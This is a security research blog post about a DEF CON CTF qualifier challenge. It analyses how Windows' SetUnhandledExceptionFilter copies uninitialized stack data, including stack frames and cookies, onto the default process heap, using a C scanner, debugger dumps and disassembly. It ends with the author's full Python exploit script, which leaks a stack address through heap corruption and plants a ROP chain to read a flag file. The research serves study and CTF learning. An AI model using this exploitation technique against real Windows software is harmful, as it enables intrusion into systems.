Disclosing stack data (stack frames, GS cookies etc.) from the default heap on Windows

In the previous blog post, I discussed a modest technique to “fix” the default process heap in order to prevent various Windows API functions from crashing, by replacing the corresponding field in PEB (Process Environment Block) with a freshly created heap. This of course assumes that the attacker has already achieved arbitrary code execution, or is at least able to use ROP and knows the base addresses of some vital system DLLs. It is likely the last exploitation technique one would use before gaining full control over the vulnerable application or system, and was indeed used by Gynvael and me while wrapping up the exploitation of the easier challenge during this year’s DEF CON CTF qualifiers which took place in May.

However, before we could even reach that stage, I had to overcome a few other significant obstacles, the hardest of which was converting the available primitives into a hijacked control flow. Following hours of trying to reproduce the same heap layout on the organizers’ and my own platform (exploiting the bugs was in fact the easiest part), I finally managed to achieve close to arbitrary memory read and write capabilities. By that point, I knew the location of the heap, the challenge image base and NTDLL.DLL image base, where I could freely read from and write to. On the other hand, the task itself did not make it easy to get controlled EIP even with such powerful primitives, as it didn’t store plain-text function pointers, virtual objects or any data directly controlling the execution flow on either the heap or in static memory. This meant that a generic technique had to be used instead.

All of the ideas I tested throughout Day 2 of the competition fell through. The CRT-related function pointers in static memory I could potentially overwrite were encoded with the EncodePointer API. There were some vtable pointers on the heap used during program termination, but I was unable to get them positioned in a similar fashion both locally and remotely, and I strived to write an exploit that I could test in both environments (a fellow CTF player – Dougall – didn’t care and just blindly exploited the bug on the task server). I had a pretty decent idea centered around a list of destructor pointers saved in NTDLL, but in a last attempt to find a simpler and more elegant solution, I decided to check if the stack address couldn’t be somehow leaked from heap, which I could read without any limits.

In theory, storing stack addresses on the heap doesn’t make any sense. The heap is designed for long-lasting allocations that can be passed between various execution contexts within a single process (functions, threads etc.), while stack objects are only valid for the duration of a function execution (or even shorter). Thus, we should not typically observe any stack addresses placed on the heap, or else they would indicate some very poor programming practices. However, Windows is a complex system full of unexpected quirks, so there might still be many non-obvious reasons for such behavior, and all I really needed was a single stack address at a roughly consistent position on the heap. With this assumption, I wrote the following simple program to scan through the entire default process heap in search of the desired addresses:

#include <windows.h>
#include <assert.h>
#include <tchar.h>

#include <cstdio>

int __cdecl _tmain() {
  MEMORY_BASIC_INFORMATION mbi = { 0 };
  assert(VirtualQuery(GetProcessHeap(), &mbi, sizeof(mbi)) != 0);
  assert((mbi.State & MEM_COMMIT) != 0);

  SIZE_T heap_start = (SIZE_T)GetProcessHeap();
  SIZE_T heap_end = heap_start + mbi.RegionSize;
  SIZE_T stack_object;
  SIZE_T stack_address = (((SIZE_T)&stack_object) & ~0xfff);

  printf("Heap start:     %x\n", heap_start);
  printf("Heap end:       %x\n", heap_end);
  printf("Stack address:  %x (%p)\n", stack_address, &stack_object);
  
  for (SIZE_T heap_address = heap_start; heap_address < heap_end; heap_address += sizeof(SIZE_T)) {
    SIZE_T heap_data;
    memcpy(&heap_data, (LPVOID)heap_address, sizeof(SIZE_T));

    if ((heap_data & ~0xfffLL) == stack_address) {
      printf("[+] Found address %x at heap location %x.\n", heap_data, heap_address);
    }
  }

  return 0;
}

When I built and started the program, I saw an output similar to the following:

Heap start:     450000
Heap end:       4b1000
Stack address:  22f000 (0022FD24)
[+] Found address 22fd10 at heap location 4b06b4.
[+] Found address 22fd10 at heap location 4b06e0.
[+] Found address 22fd50 at heap location 4b06ec.
[+] Found address 22fd20 at heap location 4b0714.
[+] Found address 22fd48 at heap location 4b0718.
[+] Found address 22fda4 at heap location 4b071c.

Bingo! It turned out that ~6 stack addresses could be reliably found next to each other on the heap of a 32-bit process. I took advantage of this fact to disclose one of them in my exploit, making it possible to write the ROP chain directly to the stack, and saving myself a lot of time and trouble related to going through more levels of indirection, such as stack pivoting etc. The full exploit code I used during the CTF (excluding the ROP chain and crypto functions) can be found at the bottom of the post.

In the following sections, I go through a brief analysis of where these addresses came from and what they were doing there.

Analysis

It’s definitely great that the addresses showed up on the process heap and enabled me to solve the CTF task. During the competition, I didn’t care about the origin of the data or how it could possibly end up there, but I sure had to find the root cause afterwards. Such an unusual behavior could be a sign of something fishy or just plain interesting going on either in the C runtime library, or the Windows API. Both my test program and the challenge were built with Microsoft Visual C++, so it also might have been something specific to the compiler.

To start things off, let’s check the heap location where the addresses were found to obtain some details about the containing allocation:

0:000> !heap -x 4b06b4
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
004b04f8  004b0500  00450000  00450000       448       228         8  busy

We now know that the chunk is 0x440 bytes in size, and that all stack addresses are contained within it. Let’s dump the memory region:

0:000> db 004b0500 004b0500+440-1
004b0500  00 00 1f 01 00 f0 04 00-00 00 00 01 48 00 4a 00  ............H.J.
004b0510  14 05 4b 00 5c 00 44 00-65 00 76 00 69 00 63 00  ..K.\.D.e.v.i.c.
004b0520  65 00 5c 00 48 00 61 00-72 00 64 00 64 00 69 00  e.\.H.a.r.d.d.i.
004b0530  73 00 6b 00 56 00 6f 00-6c 00 75 00 6d 00 65 00  s.k.V.o.l.u.m.e.
004b0540  32 00 5c 00 74 00 65 00-73 00 74 00 5f 00 61 00  2.\.t.e.s.t._.a.
004b0550  70 00 70 00 2e 00 65 00-78 00 65 00 00 00 ae af  p.p...e.x.e.....
004b0560  b0 b1 b2 b3 b4 b5 b6 b7-b8 b9 ba bb bc bd be bf  ................
004b0570  e0 e1 e2 e3 e4 e5 e6 e7-e8 e9 ea eb ec ed ee ef  ................
004b0580  f0 f1 f2 f3 f4 f5 f6 d7-f8 f9 fa fb fc fd fe df  ................
004b0590  e0 e1 e2 e3 e4 e5 e6 e7-e8 e9 ea eb ec ed ee ef  ................
004b05a0  f0 f1 f2 f3 f4 f5 f6 f7-f8 f9 fa fb fc fd fe ff  ................
004b05b0  20 01 02 03 04 05 06 07-08 09 0a 0b 0c 0d 0e 0f   ...............
004b05c0  10 11 12 13 14 15 16 17-18 19 1a 1b 1c 1d 1e 1f  ................
004b05d0  20 21 22 23 24 25 26 27-28 29 2a 2b 2c 2d 2e 2f   !"#$%&'()*+,-./
004b05e0  30 31 32 33 34 35 36 37-38 39 3a 3b 3c 3d 3e 3f  0123456789:;<=>?
004b05f0  40 41 42 43 44 45 46 47-48 49 4a 4b 4c 4d 4e 4f  @ABCDEFGHIJKLMNO
004b0600  50 51 52 53 54 55 56 57-58 59 5a 5b 5c 5d 5e 5f  PQRSTUVWXYZ[\]^_
004b0610  60 61 62 63 64 65 66 67-68 69 6a 6b 6c 6d 6e 6f  `abcdefghijklmno
004b0620  70 71 72 73 74 75 76 77-78 79 7a 7b 7c 7d 7e 7f  pqrstuvwxyz{|}~.
004b0630  80 81 82 83 84 85 86 87-88 89 8a 8b 8c 8d 8e 8f  ................
004b0640  90 91 92 93 94 95 96 97-98 99 9a 9b 9c 9d 9e 9f  ................
004b0650  a0 a1 a2 a3 a4 a5 a6 a7-a8 a9 aa ab ac ad ae af  ................
004b0660  b0 b1 b2 b3 b4 b5 b6 b7-b8 b9 ba bb bc bd be bf  ................
004b0670  c0 c1 c2 c3 c4 c5 c6 c7-c8 c9 ca cb cc cd ce cf  ................
004b0680  d0 d1 d2 d3 d4 d5 d6 d7-d8 d9 da db dc dd de df  ................
004b0690  e0 e1 e2 e3 e4 e5 e6 e7-e8 e9 ea eb ec ed ee ef  ................
004b06a0  f0 f1 f2 f3 f4 f5 f6 f7-f8 f9 fa fb fc fd fe ff  ................
004b06b0  8c 6c 40 43 10 fd 22 00-47 fd 20 01 d8 02 4b 00  .l@C..".G. ...K.
004b06c0  f8 04 4b 00 00 00 00 00-57 fd 20 01 00 00 00 00  ..K.....W. .....
004b06d0  0d 00 00 00 00 00 00 00-d8 02 4b 00 00 01 00 00  ..........K.....
004b06e0  10 fd 22 00 a3 ea 20 01-58 96 23 01 50 fd 22 00  .."... .X.#.P.".
004b06f0  d7 fa 20 01 0d 00 00 00-05 fb 20 01 04 6d 40 43  .. ....... ..m@C
004b0700  00 00 00 00 18 e3 22 01-00 00 00 00 88 af 4a 00  ......".......J.
004b0710  00 01 00 00 20 fd 22 00-48 fd 22 00 a4 fd 22 00  .... .".H."...".
004b0720  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0730  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0740  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
[...]
004b0910  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0920  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0930  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

Interesting! We can already notice here that at offset 0xc there is a unicode path to our executable file, followed by some memory which doesn’t make much sense, but contains several instances of stack addresses (in the highlighted lines). The question is: where does this data come from?

While investigating this further, I figured that the allocation was already there when the main() function got called, but was still missing at the program entry point. This meant that it was created in the CRT prologue added by the compiler. Hence, I began looking for the culprit starting with the wmainCRTStartup() routine. Going deeper and deeper into the rabbit hole, I eventually arrived at the following stack trace:

0:000> kb
ChildEBP RetAddr  Args to Child              
002ef7ec 0128e773 0128585c 002ef80c 0128d053 kernel32!SetUnhandledExceptionFilter
002ef7f8 0128d053 0128585c 01288f6f 00000000 test_app!__crtSetUnhandledExceptionFilter+0xc [f:\dd\vctools\crt\crtw32\misc\winapisupp.c @ 199]
002ef800 01288f6f 00000000 002ef81c 01288dc5 test_app!__CxxSetUnhandledExceptionFilter+0xa [f:\dd\vctools\crt\crtw32\eh\unhandld.cpp @ 60]
002ef80c 01288dc5 012ae208 012ae524 002ef85c test_app!_initterm_e+0x17 [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 1006]
002ef81c 01288166 00000001 7fb872f3 00000000 test_app!_cinit+0x39 [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 298]
002ef85c 76db338a 7efde000 002ef8a8 77ce9902 test_app!__tmainCRTStartup+0xd6 [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 237]
002ef868 77ce9902 7efde000 7b21f23f 00000000 kernel32!BaseThreadInitThunk+0xe
002ef8a8 77ce98d5 01285366 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
002ef8c0 00000000 01285366 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b

It is typical of a C++ compiler to add the setting of a generic unhandled exception filter, whose purpose is to deal with several C++ specific exceptions. This is accomplished through the CxxSetUnhandledExceptionFilter function registered as a constructor, and therefore called by _initterm_e before any user code takes control, and which by itself only consists of a simple SetUnhandledExceptionFilter API call. The question remains: why and how does the documented function “pollute” the heap with data that shouldn’t really be there?

If you take a look at the specific implementation of the API, you will notice that kernel32.dll uses two static pointers to describe the current top level filter: BasepFilterInfo pointing at a heap-allocated structure of size 0x440 containing some basic properties of the function, and BasepCurrentTopLevelFilter pointing at the function itself (in an encoded form). A simplified logic of SetUnhandledExceptionFilter is as follows:

Allocate a ~0x220 byte long structure on the stack, let’s call it LocalFilterInfo, without any initialization.

.text:7DD78791 ; LPTOP_LEVEL_EXCEPTION_FILTER __stdcall SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
.text:7DD78791                 public _SetUnhandledExceptionFilter@4
.text:7DD78791 _SetUnhandledExceptionFilter@4 proc near ; DATA XREF: .text:off_7DE201B0
.text:7DD78791
.text:7DD78791 LocalFilterInfo = dword ptr -220h
.text:7DD78791 lpTopLevelExceptionFilter= dword ptr  8
.text:7DD78791
...
.text:7DD78791
.text:7DD78791                 mov     edi, edi
.text:7DD78793                 push    ebp
.text:7DD78794                 mov     ebp, esp
.text:7DD78796                 sub     esp, 220h

Fill the structure with information using an internal BasepFillUEFInfo function.

.text:7DD787A9                 lea     eax, [ebp+LocalFilterInfo]
.text:7DD787AF                 push    eax             ; int
.text:7DD787B0                 push    esi             ; lpAddress
.text:7DD787B1                 call    _BasepFillUEFInfo@8 ; BasepFillUEFInfo(x,x)

If the BasepFilterInfo pointer is NULL, allocate a memory region of size 0x440 on the heap:

.text:7DD787C6                 mov     ebx, _BasepFilterInfo
.text:7DD787CC                 test    ebx, ebx
.text:7DD787CE                 jz      loc_7DD788E3
[...]
.text:7DD788E3                 call    _KernelBaseGetGlobalData@0 ; KernelBaseGetGlobalData()
.text:7DD788E8                 mov     eax, [eax+2Ch]
.text:7DD788EB                 mov     ecx, large fs:18h
.text:7DD788F2                 push    440h            ; Size
.text:7DD788F7                 add     eax, 2C0000h
.text:7DD788FC                 push    eax             ; Flags
.text:7DD788FD                 mov     eax, [ecx+30h]
.text:7DD78900                 push    dword ptr [eax+18h] ; HeapHandle
.text:7DD78903                 call    ds:__imp__RtlAllocateHeap@12 ; RtlAllocateHeap(x,x,x)

Copy the stack-based LocalFilterInfo structure into the heap-based BasepFilterInfo object, and change the BasepCurrentTopLevelFilter pointer to the new value.

As you have surely guessed by now, the problem is rooted in the fact that the LocalFilterInfo stack object is not initialized with zeros. While the overall layout of the structure is quite simple, it is sufficient to observe that it contains a buffer for the unicode name of the image which the filter function resides in, at offset 0xc. The buffer is filled via a call to NtQueryVirtualMemory with the MemorySectionName parameter inside the BasepFillUEFInfo function:

.text:7DD788BE                 push    0               ; ReturnLength
.text:7DD788C0                 push    212h            ; MemoryInformationLength
.text:7DD788C5                 add     esi, 0Ch
.text:7DD788C8                 push    esi             ; MemoryInformation
.text:7DD788C9                 push    MemorySectionName ; MemoryInformationClass
.text:7DD788CB                 push    [ebp+lpAddress] ; BaseAddress
.text:7DD788CE                 push    0FFFFFFFFh      ; ProcessHandle
.text:7DD788D0                 call    edi ; NtQueryVirtualMemory(x,x,x,x,x,x) ; NtQueryVirtualMemory(x,x,x,x,x,x)

If the memory section name is shorter than ~260 characters (it typically is), the rest of the buffer will remain uninitialized, and will be copied in such form to the process heap. Depending on the caller and prior execution flow, the leftover stack data may contain a multitude of interesting kinds of data, including return addresses (disclosing image bases), stack frames (in case of 32-bit programs), stack cookies, and potentially other sensitive data that should normally never make it to the heap in the first place. If an attacker is able to leak memory from the default process heap (through some information disclosure vulnerability) and manages to find the specific allocation made by kernel32.dll, they might be able to use this behavior to their advantage, and disclose data facilitating further exploitation or completely defeating some exploit mitigations. The allocation is especially easy to recognize thanks to the fixed size, and the fact that it contains a path to the image currently holding the top level filter.

And so, this small detail in the implementation of the SetUnhandledExceptionFilter API called by Microsoft’s CRT at process startup made it possible for me to solve a DEF CON CTF quals challenge that would be otherwise much more difficult to pwn. As the technique requires a very specific set of preconditions (being able to read from default process heap, not already having a vector for hijacking execution etc.), we don’t expect it to be useful in many scenarios, but I still think it’s interesting enough to keep in mind. Frankly, I also find it quite amusing that every VC++ compiled program starts with ~500 bytes of uninitialized stack data copied to the heap, before it even executes any code by itself.

On a side note, we find it likely (although it’s not confirmed) that this behavior was introduced almost exactly 10 years ago in the MS06-051 bulletin, which included a fix for a design flaw around the SetUnhandledExceptionFilter function. The research was documented in detail in the “exploiting the otherwise non-exploitable on windows” article released by Skywing and skape, and it motivated Microsoft to add extra security checks to the API in question, in order to make sure the original flaw (which couldn’t be eliminated without a complete redesign) wouldn’t lead to accepting a dangling pointer as a valid exception filter. If you’re not familiar with the paper, I strongly encourage you to read it. :)

easier challenge exploit code

import os
import select
import socket
import struct
import sys
import telnetlib
import time
from encdec import *
import pwnbase

host = "easier_55605f781f413a2b699377ced27617f0.quals.shallweplayaga.me"
port = 8989

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer[-len(text):] != text:
    buffer += s.recv(1)
  return buffer[:-len(text)]

##########################################################################
# Exploit start
##########################################################################

def dd(x):
  return struct.pack("<I", x)

def create_object(s, ints):
  op = enc_chunk(1, len(ints) * 4)
  s.sendall("%d %d\n" % (op[0], op[1]))
  s.sendall(" ".join(map(lambda x: str(x), ints)) + "\n")

def print_object(s, idx):
  op = enc_chunk(2, idx)
  s.sendall("%d %d\n" % (op[0], op[1]))

def free_object(s, idx):
  op = enc_chunk(3, idx)
  s.sendall("%d %d\n" % (op[0], op[1]))

def copy_object(s, where, idx):
  assert(where == 0 or where == 64)
  op = enc_chunk(5, (idx << 8) | where)
  s.sendall("%d %d\n" % (op[0], op[1]))

def create_systeminfo_object(s):
  op = enc_chunk(8, 0)
  s.sendall("%d %d\n" % (op[0], op[1]))

def dump_to_dwords(text):
  dwords = []
  for _ in map(lambda x: int(x, 16), text.split()):
    dwords.append(_)
  return dwords

def encode_dwords(dwords):
  if (len(dwords) % 2) == 1:
    dwords += [0xcccccccc]

  encoded = []
  i = 0
  while i < len(dwords):
    encoded += list(enc_chunk(dwords[i], dwords[i + 1]))
    i += 2
  return encoded

def decode_dwords(dwords):
  decoded = []
  i = 0
  while i < len(dwords):
    decoded += list(dec_chunk(dwords[i], dwords[i + 1]))
    i += 2
  return decoded

def bytes_to_dwords(data):
  dwords = []
  i = 0
  while i < len(data):
    dwords += [struct.unpack("<I", data[i: i + 4])[0]]
    i += 4
  return dwords

if len(sys.argv) > 1:
  host = sys.argv[1]

if len(sys.argv) > 2:
  port = int(sys.argv[2])

s = socket.socket()
s.connect((host, port))

read_until(s, "\n")
s.sendall("3 4 5 6\n")

# Create two objects #0 and #1 to be placed next to each other and before the pointer array.
DWORDS = 16
create_object(s, encode_dwords([0xcccccccc] * DWORDS))
create_object(s, encode_dwords([0xcccccccc] * DWORDS))

# Create a large object #2 to have its size moved to #0.
create_object(s, [1] * 20)

# Move the size of object #2 into #0, so we get out-of-bounds access to it.
copy_object(s, 0, 2)

# Print out the contents of adjacent heap memory of object #0.
print_object(s, 0)
data = read_until(s, "\n")
print "------------------------------- Object #0 data dumped:\n%s" % data

heap_dwords = dump_to_dwords(data)

# Create an object #3 to overwrite #0, which will overwrite #1's size field from 0x40 to the desired value.
NEW_SIZE = 0x1900
create_object(s, encode_dwords(heap_dwords[:19] + [NEW_SIZE]))

# Overwrite object #0, resulting in #1's modified size.
copy_object(s, 0, 3)

# Print out #0 to make sure it was correctly overwritten.
print_object(s, 0)
data = read_until(s, "\n")
print "------------------------------- Object #0 data dumped with overwritten #1 size:\n%s" % data

# Insert ROP into objects #4 and #5 for future exploitation (it's convenient to leak the object's address now).
NTDLL_BASE = 0x77180000
IMAGE_BASE = 0x01090000
rop = pwnbase.my_little_pwnie_rop_is_magic(0, NTDLL_BASE, IMAGE_BASE, "key.txt", 0)
rop = bytes_to_dwords(rop.ljust(len(rop) + (4 - (len(rop) & 3)), "\xcc"))
create_object(s, encode_dwords([0xaaaaaaaa] * 45 + rop))

# Create object #5 with length 8, which we will later use to free() it and transfer the size to object #0.
create_object(s, encode_dwords([1] * 2))

# Get the data of object #1, which will leak the location of the pointer array, ROP buffer, etc.
print_object(s, 1)
data = read_until(s, "\n")
print "------------------------------- Heap data adjacent to object #1 dumped:\n%s" % data

dwords = dump_to_dwords(data)

OBJECT_0_ADDR = None
OBJECT_1_ADDR = None
OBJECT_5_ADDR = None
STACK_ARRAY_OFFSET = None
ROP_ADDR = None

i = 0
while i + 3 < len(dwords):
  if (dwords[i + 1] - dwords[i] == 0x50) and (dwords[i + 2] - dwords[i + 1] == 0x50) and (dwords[i + 3] - dwords[i + 2] == 0):
    OBJECT_0_ADDR = dwords[i]
    OBJECT_1_ADDR = dwords[i + 1]
    OBJECT_5_ADDR = dwords[i + 5]
    STACK_ARRAY_OFFSET = i + 0x14
    ROP_ADDR = dwords[i + 4]
    break
  i += 1

if OBJECT_0_ADDR == None:
  print "[-] Pointer array not found in the dumped heap."
  sys.exit(1)

print "------------------------------- Heap pointer array found. Data:"
print "  Object #0 address:  %x" % OBJECT_0_ADDR
print "  Object #1 address:  %x" % OBJECT_1_ADDR
print "  Object #5 address:  %x" % OBJECT_5_ADDR
print "  Stack array offset: %d" % STACK_ARRAY_OFFSET
print "  ROP address:        %x\n" % ROP_ADDR

assert((STACK_ARRAY_OFFSET >= 1200) and (STACK_ARRAY_OFFSET < 1600))

# Free object #0 so that we can reset its size.
copy_object(s, 0, 0)

# Create object #6, which will be reallocated to the buffer of #0 (hopefully).
create_object(s, encode_dwords([0xcccccccc] * DWORDS))

# Insert the large size of #1 into #0, so we can use it to overwrite the pointer array.
copy_object(s, 0, 1)

# Print out the contents of the object again, so that we can get the most recent heap metadata to restore it when overwriting entry #0 in pointer array.
print_object(s, 0)
data = read_until(s, "\n")
print "------------------------------- Heap data adjacent to object #0 with large size:\n%s" % data

dwords = dump_to_dwords(data)

# Create objects #7, #8, #9, #10 with parts of the original heap metadata and overwritten entry #0 pointer in the pointer array at the end.
assert(dwords[STACK_ARRAY_OFFSET] == OBJECT_0_ADDR)

dwords[STACK_ARRAY_OFFSET + 0] = OBJECT_0_ADDR + (STACK_ARRAY_OFFSET * 4)
dwords[STACK_ARRAY_OFFSET + 7] = OBJECT_5_ADDR
dwords[STACK_ARRAY_OFFSET + 12] = OBJECT_0_ADDR - 0x800 + (269 * 4) + 4

create_object(s, encode_dwords(dwords[0: 400]))
create_object(s, encode_dwords(dwords[404: 804]))
create_object(s, encode_dwords(dwords[808: 1208]))
create_object(s, encode_dwords(dwords[1212:]))

# Once more create a ROP entry at #11.
create_object(s, encode_dwords(bytes_to_dwords("\xcc" * 304)))

# Overwrite entry #0 in the pointer array at offset STACK_ARRAY_OFFSET.
copy_object(s, 0, 7)

# Print out the dumped data.
print_object(s, 12)
dwords = dump_to_dwords(read_until(s, "\n"))
print "------------------------------- Pointer array:\n%s" % (" ".join(map(lambda x: "%.8x" % x, dwords)))

assert(dwords[6] == 0xfffffffe)
STACK_ADDR = dwords[7]

print "[+] Leaked stack address: %x" % STACK_ADDR

# Create object #12 with fake pointer array.
ptrs = [STACK_ADDR - 180] * 2
create_object(s, encode_dwords(ptrs))

# Copy object #11 into #0, modifying the pointer array.
copy_object(s, 0, 12)

# Copy ROP into the stack at object #0.
copy_object(s, 0, 4)
copy_object(s, 0, 4)

# Give control to user
t = telnetlib.Telnet()
t.sock = s
t.interact()

Analysis

easier challenge exploit code

1 thought on “Disclosing stack data (stack frames, GS cookies etc.) from the default heap on Windows”